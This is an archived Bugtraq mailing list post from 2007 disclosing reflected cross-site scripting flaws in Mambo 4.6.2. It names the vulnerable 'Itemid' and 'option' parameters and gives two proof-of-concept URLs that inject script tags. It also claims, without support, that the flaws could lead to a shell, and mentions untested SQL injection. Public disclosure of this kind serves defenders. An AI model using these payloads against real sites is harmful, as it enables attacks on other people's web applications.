|
Bugtraq
mailing list archives
Multiple xss in mambo 4.6.2
From: beenudel1986 () gmail com
Date: 18 Dec 2007 13:25:29 -0000
~~~~~~~~~~~~~~~~Application : Mambo v4.6.2~~~~~~~~~~~~~~~~
Author : Beenu Arora
website : www.darkc0de.com
Email ; beenudel1986 () gmail com
Website: http://sourceforge.net/projects/mambo/
---------------
|Multiple XSS |
---------------
a.Vulnerable URL: http://localhost/mambo/index.php?option=com_frontpage&Itemid=
Parameter = Itemid
POC
=http://localhost/mambo/http://localhost/index.php?option=com_frontpage&Itemid=>"><script>alert("XSS%20Successful")</script>
b. Vulnerable URL: http://www.localhost/index.php
Parameter = option
POC =http://localhost/index.php?option=>"><script>alert("XSS%20Successful")</script>&Itemid=1
some people might not get potential of xss but the attack can lead to complete compromise ( use shell)
perhaps there are two sql injection also but need to be tested . so next time:)
~~~~~~~~~~~~~~~~~~greetz to mah friend d3 , icqbomber , baltazar~~~~~~~~~~~~~~~~~~
By Date
By Thread
Current thread:
- Multiple xss in mambo 4.6.2 beenudel1986 (Dec 18)
|